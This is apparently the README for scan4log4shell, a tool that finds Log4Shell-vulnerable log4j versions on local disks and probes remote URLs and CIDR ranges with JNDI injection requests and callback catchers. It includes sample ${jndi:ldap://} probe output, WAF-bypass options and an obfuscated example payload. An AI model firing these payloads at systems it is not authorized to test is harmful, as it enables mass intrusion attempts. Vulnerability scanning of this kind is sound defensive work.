Scanner to send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability and to detect vulnerable log4j versions on your local file-system
- Local and remote scanner
- Supports URL and CIDR scans
- Supports DNS, LDAP & TCP callbacks for vulnerability discovery and validation
- Fuzzing of 50 HTTP request headers by default
- Fuzzing of HTTP POST data parameters
- Fuzzing of JSON data parameters
- HTTP Form detection & fuzzing
- Auth detection & fuzzing (Basic & Bearer)
- WAF Bypass payloads
CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:
- Lightweight Directory Access Protocol (LDAP)
- Secure LDAP (LDAPS)
- Remote Method Invocation (RMI)
- Domain Name Service (DNS)
You can install the pre-compiled binary in several different ways
brew tap hupe1980/scan4log4shell
brew install scan4log4shell
scoop bucket add scan4log4shell
scoop install scan4log4shell
Download the .deb, .rpm or .apk from the releases page and install them with the appropriate tools.
Download the pre-compiled binaries from the releases page and copy to the desired location.
Install a Go 1.17 compiler. Most system Go compiler come with OS are older than 1.17.
Run the following command in the checked-out repository:
make build
(Add the appropriate .exe extension on Windows systems, of course.)
git clone
cd scan4log4shell
make docker-build
# Scan the current working directory
docker run -it --rm -v $PWD:/data scan4log4shell local /data
scan4log4shell [command]
Available Commands:
catch Start a standalone callback catcher
completion Prints shell autocompletion scripts for scan4log4shell
help Help about any command
local Detect vulnerable log4j versions on your file-system
remote Send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability
-h, --help help for scan4log4shell
--no-color disable color output
-o, --output string output logfile name
-v, --verbose print detailed logging messages
--version version for scan4log4shell
Use "scan4log4shell [command] --help" for more information about a command.
Start a standalone callback catcher
scan4log4shell catch [tcp | dns | ldap] [flags]
- Start a standalone dns catcher: scan4log4shell catch dns
- Start a standalone ldap catcher: scan4log4shell catch ldap --caddr
- Start a standalone tcp catcher: scan4log4shell catch tcp --caddr
--caddr string address to catch the callbacks (eg. ip:port)
-h, --help help for catch
Global Flags:
--no-color disable color output
-o, --output string output logfile name
-v, --verbose print detailed logging messages
Detect vulnerable log4j versions on your file-system
scan4log4shell local [paths] [flags]
- Scan /var/www: scan4log4shell local /var/www
- Ignore zip & aar: scan4log4shell local . --ignore-ext .zip --ignore-ext .aar
-e, --exclude stringArray path to exclude
-h, --help help for local
--ignore-cve-2021-45046 ignore CVE-2021-45046
--ignore-cve-2021-45105 ignore CVE-2021-45105
--ignore-ext stringArray ignore .jar | .zip | .war | .ear | .aar
--ignore-v1 ignore log4j 1.x versions
--max-threads int max number of concurrent threads (default 5)
Global Flags:
--no-color disable color output
-o, --output string output logfile name
-v, --verbose print detailed logging messages
make run-local
scanner_1 | [i] Log4Shell CVE-2021-44228 Local Vulnerability Scan
scanner_1 | [i] Start scanning path /walk
scanner_1 | ---------
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0-javadoc.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0-sources.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0-javadoc.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0-sources.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar...
scanner_1 | [!] Hit: possibly CVE-2021-45046 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar
scanner_1 | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar
scanner_1 | [!] Hit: possibly CVE-2021-44228 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar
scanner_1 | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar...
scanner_1 | [!] Hit: possibly CVE-2021-45046 vulnerable file identified: /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar
scanner_1 | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar
scanner_1 | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-spring-boot-2.15.0.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.16.0-bin/log4j-api-2.16.0.jar...
scanner_1 | [i] Inspecting /walk/apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar...
scanner_1 | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar
scanner_1 | [i] Inspecting /walk/jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar...
scanner_1 | [!] Hit: log4j V1 identified: /walk/jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar
scanner_1 | [i] Completed scanning
Send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability
scan4log4shell remote [command]
Available Commands:
cidr Send specially crafted requests to a cidr
url Send specially crafted requests to an url
-h, --help help for remote
Global Flags:
--no-color disable color output
-o, --output string output logfile name
-v, --verbose print detailed logging messages
Send specially crafted requests to a cidr
scan4log4shell remote cidr [cidr] [flags]
- Scan a complete cidr: scan4log4shell remote cidr
- TCP catcher: scan4log4shell remote cidr --catcher-type tcp --caddr
- Custom headers file: scan4log4shell remote cidr --headers-file ./headers.txt
- Run all tests: scan4log4shell remote cidr -a
-a, --all shortcut to run all checks
--auth-fuzzing add auth fuzzing
--basic-auth string basic auth credentials (eg. user:pass)
--caddr string address to catch the callbacks (eg. ip:port)
--catcher-type string type of callback catcher (dns | ldap | tcp | none) (default "dns")
--check-cve-2021-45046 check for CVE-2021-45046
--field strings field to use
--fields-file string use custom field from file
--form-fuzzing add form submits to fuzzing
--header strings header to use
--headers-file string use custom headers from file
-h, --help help for cidr
--max-threads int max number of concurrent threads (default 150)
--no-redirect do not follow redirects
--no-user-agent-fuzzing exclude user-agent header from fuzzing
--no-wait-timeout wait forever for callbacks
--param strings query param to use
--params-file string use custom query params from file
--payload strings payload to use
--payloads-file string use custom payloads from file
-p, --port strings port to scan (default [8080])
--proxy string proxy url
-r, --resource string resource in payload (default "l4s")
--schema string schema to use for requests (default "https")
--set-field stringToString set fix field value (key=value) (default [])
--set-header stringToString set fix header value (key=value) (default [])
--set-param stringToString set fix query param value (key=value) (default [])
--timeout duration time limit for requests (default 3s)
-t, --type strings get, post or json (default [get])
--waf-bypass extend scans with WAF bypass payload
-w, --wait duration wait time to catch callbacks (default 5s)
Global Flags:
--no-color disable color output
-o, --output string output logfile name
-v, --verbose print detailed logging messages
Send specially crafted requests to an url
scan4log4shell remote url [urls] [flags]
- Scan a url: scan4log4shell remote url
- Scan multiple urls: scan4log4shell remote url
- Scan multiple urls: cat targets.txt | scan4log4shell remote url
- TCP catcher: scan4log4shell remote url --catcher-type tcp --caddr
- Custom headers file: scan4log4shell remote url --headers-file ./headers.txt
- Scan url behind basic auth: scan4log4shell remote url --basic-auth user:pass
- Run all tests: scan4log4shell remote url -a
-a, --all shortcut to run all checks
--auth-fuzzing add auth fuzzing
--basic-auth string basic auth credentials (eg. user:pass)
--caddr string address to catch the callbacks (eg. ip:port)
--catcher-type string type of callback catcher (dns | ldap | tcp | none) (default "dns")
--check-cve-2021-45046 check for CVE-2021-45046
--field strings field to use
--fields-file string use custom field from file
--form-fuzzing add form submits to fuzzing
--header strings header to use
--headers-file string use custom headers from file
-h, --help help for url
--max-threads int max number of concurrent threads (default 150)
--no-redirect do not follow redirects
--no-user-agent-fuzzing exclude user-agent header from fuzzing
--no-wait-timeout wait forever for callbacks
--param strings query param to use
--params-file string use custom query params from file
--payload strings payload to use
--payloads-file string use custom payloads from file
--proxy string proxy url
-r, --resource string resource in payload (default "l4s")
--set-field stringToString set fix field value (key=value) (default [])
--set-header stringToString set fix header value (key=value) (default [])
--set-param stringToString set fix query param value (key=value) (default [])
--timeout duration time limit for requests (default 3s)
-t, --type strings get, post or json (default [get])
--waf-bypass extend scans with WAF bypass payload
-w, --wait duration wait time to catch callbacks (default 5s)
Global Flags:
--no-color disable color output
-o, --output string output logfile name
-v, --verbose print detailed logging messages
make run-remote
scanner_1 | [i] Log4Shell Remote Vulnerability Scan
scanner_1 | [i] Listening on
scanner_1 | [i] Start scanning CIDR
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [!] Possibly vulnerable host identified:
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [i] Checking ${jndi:ldap://} for [GET]
scanner_1 | [!] Possibly vulnerable host identified:
If you specify a file with custom payloads, you can use the following placeholders for callback address and resource:
- {{ .CADDR }}
- {{ .Resource }}
For example:
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//{{ .CADDR }}/{{ .Resource }}}
You can find more examples here